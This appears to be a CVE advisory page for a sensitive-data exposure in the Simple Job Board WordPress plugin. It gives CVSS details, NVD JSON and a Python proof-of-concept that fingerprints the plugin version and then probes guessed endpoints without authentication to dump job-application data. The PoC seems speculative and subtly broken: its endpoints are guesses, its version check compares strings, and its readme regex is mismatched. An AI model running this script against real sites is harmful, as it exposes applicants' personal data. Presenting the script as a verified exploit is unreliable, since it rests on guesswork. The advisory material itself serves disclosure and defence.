Security Vulnerability Report
中文
CVE-2025-59579 CVSS 7.5 HIGH

CVE-2025-59579

Published: 2025-10-22 15:15:56
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in PressTigers Simple Job Board simple-job-board allows Retrieve Embedded Sensitive Data.This issue affects Simple Job Board: from n/a through <= 2.13.7.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

PressTigers Simple Job Board <= 2.13.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import re # CVE-2025-59579 PoC - Simple Job Board Sensitive Data Exposure # Target: WordPress site with Simple Job Board plugin <= 2.13.7 def exploit_cve_2025_59579(target_url): """ PoC for CVE-2025-59579: Sensitive Data Exposure in Simple Job Board plugin This script demonstrates how an unauthenticated attacker can retrieve embedded sensitive data from job applications. """ print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-59579...") # Step 1: Identify if Simple Job Board plugin is installed plugin_paths = [ '/wp-content/plugins/simple-job-board/readme.txt', '/wp-content/plugins/simple-job-board/simple-job-board.php' ] for path in plugin_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: version_match = re.search(r'Tag:\s*([\d.]+)', response.text) if version_match: version = version_match.group(1) print(f"[+] Found Simple Job Board version: {version}") if version <= '2.13.7': print(f"[!] Version {version} is vulnerable to CVE-2025-59579") except requests.RequestException as e: print(f"[-] Error checking plugin: {e}") # Step 2: Try to access job applications data endpoint # Common vulnerable endpoints vulnerable_endpoints = [ '/wp-json/wp/v2/job-application', '/?post_type=jobpost&action=download_resume', '/wp-admin/admin-ajax.php?action=get_job_applications' ] for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200 and 'application' in response.text.lower(): print(f"[+] Potentially vulnerable endpoint found: {endpoint}") print(f"[+] Response preview: {response.text[:500]}...") except requests.RequestException: pass print("[*] PoC execution completed") print("[*] Note: This is for educational purposes only") if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit_cve_2025_59579(sys.argv[1]) else: print("Usage: python cve-2025-59579-poc.py <target_url>")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59579", "sourceIdentifier": "[email protected]", "published": "2025-10-22T15:15:56.167", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in PressTigers Simple Job Board simple-job-board allows Retrieve Embedded Sensitive Data.This issue affects Simple Job Board: from n/a through <= 2.13.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/simple-job-board/vulnerability/wordpress-simple-job-board-plugin-2-13-7-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}